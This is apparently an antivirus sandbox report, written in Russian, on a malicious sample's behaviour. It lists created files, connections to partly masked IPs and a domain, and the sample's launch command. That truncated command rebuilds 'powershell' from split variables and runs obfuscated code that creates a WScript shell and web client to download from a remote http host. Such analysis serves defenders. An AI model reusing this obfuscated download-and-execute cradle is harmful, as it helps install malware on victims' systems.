Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c set x=pow&& set y=ersh&& set z=ell&& call %x%%y%%z% $XNTvnB7X = '$grIR4 = new-obj000ect -com000obj000ect wsc000ript.she000ll;$uxdHKuZC = new-object sys000tem.net.web000client;$HaGkC7 = new-o...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1187698.cvr
Сетевая активность
Подключается к
- '23.#3.29.10':80
- '35.#04.88.6':80
- '3.##.91.237':80
- 'ua#####ence.oablab.com':80
- '34.##7.179.222':80
UDP
- DNS ASK ua#####ence.oablab.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c set x=pow&& set y=ersh&& set z=ell&& call %x%%y%%z% $XNTvnB7X = '$grIR4 = new-obj000ect -com000obj000ect wsc000ript.she000ll;$uxdHKuZC = new-object sys000tem.net.web000client;$HaGkC7 = new-o...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $XNTvnB7X = '$grIR4 = new-obj000ect -com000obj000ect wsc000ript.she000ll;$uxdHKuZC = new-object sys000tem.net.web000client;$HaGkC7 = new-object random;$VefNP = \"000h000t000t000p000://23.23.29....
